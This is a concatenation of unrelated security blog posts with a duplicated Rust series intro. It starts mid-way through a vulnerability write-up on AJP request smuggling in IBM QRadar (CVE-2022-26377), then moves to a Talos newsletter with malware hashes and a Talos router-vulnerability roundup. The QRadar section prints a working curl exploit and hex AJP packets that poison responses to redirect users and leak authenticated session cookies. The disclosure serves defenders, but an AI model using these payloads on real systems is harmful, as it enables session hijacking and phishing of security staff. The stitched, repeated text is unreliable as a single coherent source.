As anyone that has ever exploited anything actually knows - version numbers are are at best false-advertising, and thus - frankly - we ignored this. Also, fortunately for us, in the context of the IBM QRadar deployment of Apache, the module proxy_ajp_module is loaded.

[ec2-user@ip-172-31-24-208 tmp]$ httpd -v
Server version: Apache/2.4.6 (Red Hat Enterprise Linux)
Server built:   Apr 21 2020 10:19:09

[ec2-user@ip-172-31-24-208 modules]$ sudo httpd -M | grep proxy_ajp_module
proxy_ajp_module (shared)

To conduct a quick litmus test to whether or not QRadar is vulnerable to CVE-2022-26377, we followed along with RicterZ’s research and tried the PoC, which comes in the form of a curl invocation, intended to retrieve the web.xml file of the ROOT war file to prove exploitability.

The curl PoC can be broken down into two parts:

  • Transfer-Encoding header with the “chunked, chunked” value,
  • A raw AJP packet in binary format within the request’s body, stored here in the file pay.txt.
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \\
		--data-binary @pay.txt
00000000: 0008 4854 5450 2f31 2e31 0000 012f 0000  ..HTTP/1.1.../..
00000010: 0931 3237 2e30 2e30 2e31 00ff ff00 0161  .127.0.0.1.....a
00000020: 0000 5000 0000 0a00 216a 6176 6178 2e73  ..P.....!javax.s
00000030: 6572 766c 6574 2e69 6e63 6c75 6465 2e72  ervlet.include.r
00000040: 6571 7565 7374 5f75 7269 0000 012f 000a  equest_uri.../..
00000050: 0022 6a61 7661 782e 7365 7276 6c65 742e  ."javax.servlet.
00000060: 696e 636c 7564 652e 7365 7276 6c65 745f  include.servlet_
00000070: 7061 7468 0001 532f 2f2f 2f2f 2f2f 2f2f  path..S/////////
00000080: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000090: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000c0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000d0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000e0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000f0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000100: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000110: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000120: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000130: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000140: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000150: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000160: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000170: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000180: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000190: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001c0: 2f2f 2f2f 2f2f 2f2f 2f2f 000a 001f 6a61  //////////....ja
000001d0: 7661 782e 7365 7276 6c65 742e 696e 636c  vax.servlet.incl
000001e0: 7564 652e 7061 7468 5f69 6e66 6f00 0010  ude.path_info...
000001f0: 2f57 4542 2d49 4e46 2f77 6562 2e78 6d6c  /WEB-INF/web.xml
00000200: 00ff

After firing the PoC, we were unable to retrieve the web.xml file as expected. However, we’re quick to notice after firing it a few times in quick succession that there’s a variation between responses, with some returning a 302 status code and some a 403 .

A typical response looks something like this:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 01:48:11 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=C7714302E58A4565A3FAA7B786325D93; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-store, max-age=0
Location: /console/core/jsp/Main.jsp;jsessionid=C7714302E58A4565A3FAA7B786325D93
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Expires: Sun, 10 Mar 2024 01:48:11 GMT

And a differential response:

HTTP/1.1 403 403
Date: Sun, 10 Mar 2024 02:12:13 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Content-Length: 0
Cache-Control: max-age=1209600
Expires: Sun, 24 Mar 2024 02:12:13 GMT
X-Frame-Options: SAMEORIGIN

Using tcpdump, we can observe that our single HTTP request has indeed resulted in two AJP request packets being sent to the AJP backend. The two requests are as followed

  • The legitimate AJP request triggered by our initial HTTP request, and,
  • The smuggled request

Put simply - this makes a lot of sense - we’re definitely smuggling a request here.

At this point, we were much more interested in the varying in response status codes - what is going on here?

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Let’s take stock of what we’re observing:

  • One HTTP request results in two AJP Packets being sent to the backend
  • Somehow, HTTP Responses are being returned out of sync

Our first point is enough to arrive at the conclusion that we’ve found an instance of CVE-2022-26377. The (at the time of performing our research) up-to-date version of QRadar (7.5.0 UP7) is definitely vulnerable, since a single HTTP request can smuggle an additional AJP packet.

Our journey doesn’t end here, though. It never does.

Bugs are fun, but to assess real-world impact, we need to dive into how this can be exploited by a threat actor and determine the real risk.

Godzilla Vs Golliath(?)

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

So, the big question - we've confirmed CVE-2022-26377 it seems and excitingly we can now split one HTTP request into 2 AJP requests. But, zzz - how is CVE-2022-26377 actually exploitable in the context of QRadar?

In the previous real-world example of CVE-2022-26377 being exploited against F5, AJP packets were being parsed by additional Java functionality, which allowed authentication to be bypassed via the smuggled AJP packet with additional values injected into it.

We spent some time diving through the console application exposed by IBM QRadar, looking for scenarios similar to the F5. However, we come up short on functionality to escalate our level of authentication via just a single injected AJP packet.

Slightly exasperated by this, our next course of action can be expressed via the following quote, taken from the developers of the original F5 BigIP vulnerability researchers:

We then leveraged our advanced pentesting skills and re-ran the curl command several times, because sometimes vulnerability research is doing the same thing multiple times and somehow getting different results

As much as we like to believe that computers are magic - we have been informed via TikTok that this is not the case, and something more mundane is happening here. We noticed the application began to ‘break’, and responses were, in fact, unsynchronized. While this sounds strange - this is a relatively common artefact around request smuggling-class vulnerabilities.

When we say ‘desynchronized’, we mean that the normal “cause-and-effect” flow of a web application, or the HTTP protocol, no longer applies.

Usually, there is a very simple flow to web requests - the user makes a request, and the server issues a corresponding response. Even if two users make requests simultaneously, the server keeps the requests separate, keeping them neatly queued up and ensuring the correct user only ever sees responses for the requests they have issued. Soemthing about the magic of TCP.

However, in the case of QRadar, since a single HTTP request results in two AJP requests, we are generating an imbalance in the number of responses created. This confuses things, and as the response queue is out of sync with the request queue, the server may erraneously respond with a response intended for an entirely different user.

This is known as a DeSync Attack, for which there is some amount of public research in the context of HTTP, but relatively little concerning AJP.

But, how can we abuse this in the context of IBM's QRadar?

Anyway, tangent time

Well, where would life be without some random vulnerabilities that we find along the way?

When making a request to the console application with a doctored HTTP request 'Host' header, we can observe that QRadar trusts this value and uses it to construct values used within the Location HTTP response header - commonly known as a Host Header Injection vulnerability. Fairly common, but for the sake of completeness - here’s a request and response to show the issue:

Request:

GET /console/watchtowr HTTP/1.1
Host: watchtowr.com

Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:16:55 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=74779EA7C7827A53BD474F884657CDA6; Path=/; Secure; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: <https://watchtowr.com:443/console/logon.jsp?loadback=76edfcc6-4a57-496e-a03c-ea2e8a50ffb6>
Content-Length: 0
X-Frame-Options: SAMEORIGIN

It’s a very minor vulnerability, if you could even call it that - in practice, what good is a redirect that requires modification of the Host HTTP request header in a request sent by the victim? In almost all cases imaginable, this is completely useless.

Is this one of the vanishingly uncommon instances where it is useful?

Well, well, well…

Typically, with vulnerabilities that involve poisoning of responses, we have to look for gadgets to chain them with to escalate the magnitude of an attack - tl;dr what can we do to demonstrate impact.

Can we take something harmless, and make it harmful? Perhaps we can take the ‘useless’ Host Header Injection ‘vulnerability’ discussed above, and turn it into something fruitful.

It turns out, by formatting this Host Header Injection request into an AJP forwarding packet and sending it to the QRadar instance using our AJP smuggling technique, we can turn it into a site-wide exploit - hitting any user that is lucky(!) enough to be using QRadar.

Groan..

Below is a correctly formatted AJP Forward Request packet (note the use of B’s to correctly pad the packet out to the correct size). This AJP packet emulates a HTTP request leveraging the Host Header Injection discussed above.

We will smuggle this packet in, and observe the result. Once the queues are desynchronised, the response will be served to other users of the application, and since we control the Location response header, we can cause the unsuspecting user to be redirected to a host of our choosing.

00000000: 0008 4854 5450 2f31 2e31 0000 0b2f 636f  ..HTTP/1.1.../co
00000010: 6e73 6f6c 652f 7878 0000 0931 3237 2e30  nsole/xx...127.0
00000020: 2e30 2e31 0000 026c 6f00 0007 6c6f 6361  .0.1...lo...loca
00000030: 6c78 7400 0050 0000 0300 0154 0000 2042  lxt..P.....T.. B
00000040: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000050: 4242 4242 4242 4242 4242 4242 4242 4200  BBBBBBBBBBBBBBB.
00000060: 000a 5741 5443 4854 4f57 5230 0000 0130  ..WATCHTOWR0...0
00000070: 00a0 0b00 0d77 6174 6368 746f 7772 2e63  .....watchtowr.c
00000080: 6f6d 0003 0062 6262 6262 0005 0162 6262  om...bbbbb...bbb
00000090: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000f0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000100: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000110: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000120: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000130: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000140: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000150: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000160: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000170: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000180: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000190: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001f0: 6262 6262 6262 6262 6262 6262 6265 3d00  bbbbbbbbbbbbbe=.
00000200: ff00
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \\
		--data-binary @payload.txt

Poisoned Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:35:06 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Set-Cookie: JSESSIONID=E3D8AB1D2D6B3267BE9FB3BF3FFAD9C0; Path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: <http://watchtowr.com:80/console/logon.jsp?loadback=44d7c786-522d-4bc2-90be-f1eac249da3c>
Content-Length: 0
X-Frame-Options: SAMEORIGIN

What are we seeing here?

Well, after a few attempts, the server has started to serve the poisoned response to other users of the application - even authenticated users - to be redirected via the Location we control.

This is a clear case of CVE-2022-26377 in an exploitable manner; we can redirect all application users to an external host. Exploitation of this by a threat actor is only limited by their imagination; we can easily conjure up a likely attack scenario.

Picture a Blue Team operator logging in to their favourite QRadar instance after receiving a few of their favourite alerts, warning them of potential ransomware being deployed across their favourite infrastructure. Imagine them desperately looking for their favourite ‘patient zero’ and hoping to nip their favourite threat actors' campaign in the bud.

While navigating through their dashboards, however, an attacker uses this vulnerability to silently redirect them to a ‘fake’ QRadar instance, mirroring their own instance - but instead of those all-important alerts - all is quiet in this facade QRadar instance, and nothing is reported.

The poor Blue Team Operator goes for their lunch, confident there is no crisis - while in reality, their domain is compromised with malicious GPOs carrying the latest cryptolocker malware.

Before they even realise what's going on, it's too late; the damage is done.

In case you need a little more convincing, here’s a short video clip of the exploit taking place:

Proof of Concept

At watchTowr, we no longer publish Proof of Concepts. We heard the tweets, we heard the comments - we were making it too easy for defensive teams to build detection artefacts for these vulnerabilities contextualised to their environment.

So instead, we've decided to do something better - that's right! We're proud to release the first of many to come of our Python-based, dynamic detection artefact generator tools.

https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc

DeSync Responses

So, we'vee shown a pretty scary exploitation scenario - but it turns out we can take things even further if we apply a little creativity (ha ha, who knew that watchTowr ever take things too far 😜).

At this point, the HTTP response queue is in tatters, with authenticated responses being returned to unauthenticated users - that's right, we can leak privileged information from your QRadar SIEM, the heart of your security stack, to unauthenticated users with this vulnerability.

Well, let’s take an extremely brief look into how QRadar handles sessions.

Importantly, in QRadar’s design, each user's session values need to be refreshed relatively often - every few minutes. This is a security mechanism designed to expire values quickly, in case they are inadvertently exposed. Ironically however, we can use these as a powerful exploitation primitive, since they can be returned to unauthenticated users if the response queue is, in technical terms, "rekt". Which, at this point, it is.

Here’s how a session refresh looks:

HTTP/1.1 200 200
Date: Sun, 10 Mar 2024 02:53:34 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=CE0279DC02A0715BB41358EC44A7F546; Path=/; Secure; HttpOnly
Set-Cookie: QRadarCSRF=083a2ebb-7d42-4e56-b4a9-728843f6958e; Path=/; Secure
Set-Cookie: AJAXTimeoutLimit=5; Path=/; Secure
Set-Cookie: SEC=03de6b43-8454-469a-8d40-076f6d12a13d; Path=/; Secure; HttpOnly
Set-Cookie: inactivityTimeout=30; Path=/; Secure
Set-Cookie: lastClickTime=2024-03-10T02:53Z; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Length: 1045
Connection: close

If the above isn't sufficiently clear, the session credentials for authenticated users are returned in an HTTP response (if this is not obvious) and thus in the context of  this vulnerability, these same values would be returned to unauthenticated users.

If you follow our leading words, this would allow threat actors (or watchTowr's automation) to assume the session of the user and take control of their QRadar SIEM instance in a single request. 

Flagship security software from IBM.

Once again, exploitation is in the hands of creative threat actors; how could this be further exploited in a real-world attack?

Imagine your first day as the new Blue Team lead in a Fortune 500 organisation; you want to show off to your new employer, demonstrating all the latest threat-hunting techniques.

You’ve got your QRadar instance at hand, you’ve got agent deployment across the organisation, and you have the all-important logs to sort through and subject to your creative rulesets.

You authenticate to QRadar, and hammer away like the pro defender you are. However, a threat actor quietly DeSync’s your instance, and your session data starts to leak. They authenticate to your QRadar instance as if they were you and begin to snoop on your activities.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

A quick peek into the ingested raw logs reveals cleartext Active Directory credentials submitted by service accounts across the board. Whose hunting who now?

The threat actors campaign is just beginning, and the race to compromise the organisation has started the moment you log into your QRadar. Good job on your first day.

Thanks IBM!

Tl;dr how bad is this

To sum up the impact the vulnerability has, in the context of QRadar, from an un-authenticated perspective:

  • An unauthenticated attacker gains the ability to poison responses of authenticated users
  • An unauthenticated attacker gains the ability to redirect users to an external domain:
    • For example, the external domain could imitate the QRadar instance in a Phishing attack to garner cleartext credentials
  • An unauthenticated attacker gains the ability to cause a Denial-Of-Service in the QRadar instance and interrupt ongoing security operations
  • An unauthenticated attacker gains the ability to retrieve responses of authenticated users
    • Observe ongoing security operations
    • Extract logs from endpoints and devices feeding data to the QRadar instance
    • Obtain session data from authenticated users and administrators and authenticate with this data.

Conclusion

Hopefully, this post has shown you that as an industry we still cannot even do the basics - let alone a listed, too-big-to-fail technology vendor.

While there will be a continuation of evolution of threats that compound our timelines and day-jobs, and state-sponsored actors trying to slip backdoors into OpenSSH - it doesn't mean we ignore the.. very basics.

To see such an omission from a vendor of security software, in their flagship security product - in our opinion, this is disappointing.

Usual advice applies - patch, pray that IBM now know to update dependencies, see what happens next time.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Timeline

Date Detail
3rd January 2024 Vulnerability discovered
17th January 2024 Vulnerabilities disclosed to IBM PSIRT
17th January 2024 IBM responds and assigned the internal tracking references “ADV0108871”
25th January 2024 watchTowr hunts through client's attack surfaces for impacted systems, and communicates with those affected
26th March 2024 IBM issues a security bulletin and utilising the identifiers CVE-2022-26377 - https://www.ibm.com/support/pages/node/7145265
12th April 2024 Blogpost and PoC released to public

The internet is already scary enough without April Fool’s jokes

The internet is already scary enough without April Fool’s jokes

I feel like over the past several years, the “holiday” that is April Fool’s Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you’d find on a news site any day of the week. 

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it’s in “celebration” of a “holiday.” 

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games. 

But at least from what I saw on April 1 of this year, no one tried to “get” anyone with an April Fool’s joke about a ransomware actor requesting payment in the form of “Fortnite” in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (which, as it turns out, smart pillows exist!).  

We’re already dealing with digitally manipulated photos of “Satanic McDonalds,” Twitter’s AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos and more that I hesitate to even make up. 

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.  

The one big thing 

Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

Why do I care? 

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country who is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets’ social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account. 

So now what? 

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don’t know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default — macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here

Top security headlines of the week 

The security community is still reflecting on the “What If” of the XZ backdoor that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly on accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user’s SSH connection and secretly run their own code on that user’s machine. The incident is highlighting networking’s reliance on open-source projects, which are often provided little resource and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters

AT&T now says that more than 51 million users were affected by a data breach that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as “MajorNelson.” AT&T’s notification to affected customers stated that, "The [exposed] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information were related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch

Another ransomware group claims they’ve stolen data from United HealthCare, though there is little evidence yet to prove their claim. Change Health, a subsidiary of United, was recently hit with a massive data breach, pausing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Botconf (April 23 - 26) 

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3) 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9) 

San Francisco, California    

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0
MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

SHA 256: abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6
MD5: 22ae85259273bc4ea419584293eda886
Typical Filename: KMSAuto++ x64.exe
Claimed Product: KMSAuto++
Detection Name: W32.File.MalParent

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Kmsauto::1201

SHA 256: b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31
MD5: 2fb86be791b4bb4389e55df0fec04eb7
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: W32.File.MalParent

SHA 256: 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681
MD5: f1fe671bcefd4630e5ed8b87c9283534
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Hackkms::1201

Rust for C Developers Part 0: Introduction

Hello! It's been a while. Life has been very busy in the past few years, and I haven't posted as much as I've intended to. Isn't that how these things always go? I've got a bit of time to breathe, so I'm going to attempt to start a weekly(ish) blog series inspired by my friend scuzz3y. This series is going to be about Rust, specifically how to write it if you're coming from a lower level C/C++ background.

When I first learned Rust, I tried to write it like I was writing C. That caused me a lot of pain and suffering at the hands of both the compiler and the unsafe keyword. Since then, I have learned a lot on how to write better Rust code that not only makes more sense, but that is far less painful and requires less unsafe overall. If you already know Rust, hopefully this series teaches you a thing or two that you did not already know. If you're new to Rust, then I hope this gives you a good head start intro transitioning your projects from C/C++ to Rust (or at least to consider it).

I'm going to target this series towards Windows, but many of the concepts can be used on other platforms as well.

Some of the topics I'm going to cover include (in no particular order):

  • Working with raw bytes
  • C structures and types
  • Shellcoding
  • Extended make (cargo-make)
  • Sane error handling
  • Working with native APIs
  • Working with pointers
  • Inline ASM
  • C/C++ interoperability
  • Building python modules
  • Inline ASM and naked functions
  • Testing

If you have suggestions for things you'd like me to write about/cover, shoot me a message at [email protected].

Expect the first post next week. It will be on working with pointers.

Rust for C Developers Part 1: Introduction

Hello! It's been a while. Life has been very busy in the past few years, and I haven't posted as much as I've intended to. Isn't that how these things always go? I've got a bit of time to breathe, so I'm going to attempt to start a weekly(ish) blog series inspired by my friend scuzz3y. This series is going to be about Rust, specifically how to write it if you're coming from a lower level C/C++ background.

When I first learned Rust, I tried to write it like I was writing C. That caused me a lot of pain and suffering at the hands of both the compiler and the unsafe keyword. Since then, I have learned a lot on how to write better Rust code that not only makes more sense, but that is far less painful and requires less unsafe overall. If you already know Rust, hopefully this series teaches you a thing or two that you did not already know. If you're new to Rust, then I hope this gives you a good head start intro transitioning your projects from C/C++ to Rust (or at least to consider it).

I'm going to target this series towards Windows, but many of the concepts can be used on other platforms as well.

Some of the topics I'm going to cover include (in no particular order):

  • Working with raw bytes
  • C structures and types
  • Shellcoding
  • Extended make (cargo-make)
  • Sane error handling
  • Working with native APIs
  • Working with pointers
  • Inline ASM
  • C/C++ interoperability
  • Building python modules
  • Inline ASM and naked functions
  • Testing

If you have suggestions for things you'd like me to write about/cover, shoot me a message at [email protected].

Expect the first post next week. It will be on working with pointers.

Vulnerability in some TP-Link routers could lead to factory reset

Vulnerability in some TP-Link routers could lead to factory reset

Cisco Talos’ Vulnerability Research team has disclosed 10 vulnerabilities over the past three weeks, including four in a line of TP-Link routers, one of which could allow an attacker to reset the devices’ settings back to the factory default. 

A popular open-source software for internet-of-things (IoT) and industrial control systems (ICS) networks also contains multiple vulnerabilities that could be used to arbitrarily create new files on the affected systems or overwrite existing ones. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Denial-of-service, remote code execution vulnerabilities in TP-Link AC1350 router 

Talos researchers recently discovered four vulnerabilities in the TP-Link AC1350 wireless router. The AC1350 is one of many routers TP-Link produces and is designed to be used on home networks. 

TALOS-2023-1861 (CVE-2023-49074) is a denial-of-service vulnerability in the TP-Link Device Debug Protocol (TDDP). An attacker could exploit this vulnerability by sending a series of unauthenticated packets to the router, potentially causing a denial of service and forcing the device to reset to its factory settings.  

However, the TDDP protocol is only denial of serviceavailable for roughly 15 minutes after a device reboot.  

The TDDP protocol is also vulnerable to TALOS-2023-1862 (CVE-2023-49134 and CVE-2023-49133), a command execution vulnerability that could allow an attacker to execute arbitrary code on the targeted device. 

There is another remote code execution vulnerability, TALOS-2023-1888 (CVE-2023-49912, CVE-2023-49909, CVE-2023-49907, CVE-2023-49908, CVE-2023-49910, CVE-2023-49906, CVE-2023-49913, CVE-2023-49911) that is triggered if an attacker sends an authenticated HTTP request to the targeted device. This exploit includes multiple CVEs because an attacker could overflow multiple buffers to cause this condition. 

TALOS-2023-1864 (CVE-2023-48724) also exists in the device’s web interface functionality. An adversary could exploit this vulnerability by sending an unauthenticated HTTP request to the targeted device, thus causing a denial of service. 

Multiple vulnerabilities in OAS Platform 

Discovered by Jared Rittle. 

Open Automation Software’s OAS Platform is an IoT gateway and protocol bus. It allows administrators to connect PLCs, devices, databases and custom apps. 

There are two vulnerabilities — TALOS-2024-1950 (CVE-2024-21870) and TALOS-2024-1951 (CVE-2024-22178) — that exist in the platform that can lead to arbitrary file creation or overwrite. An attacker can send a sequence of requests to trigger these vulnerabilities.  

An adversary could also send a series of requests to exploit TALOS-2024-1948 (CVE-2024-24976), but in this case, the vulnerability leads to a denial of service. 

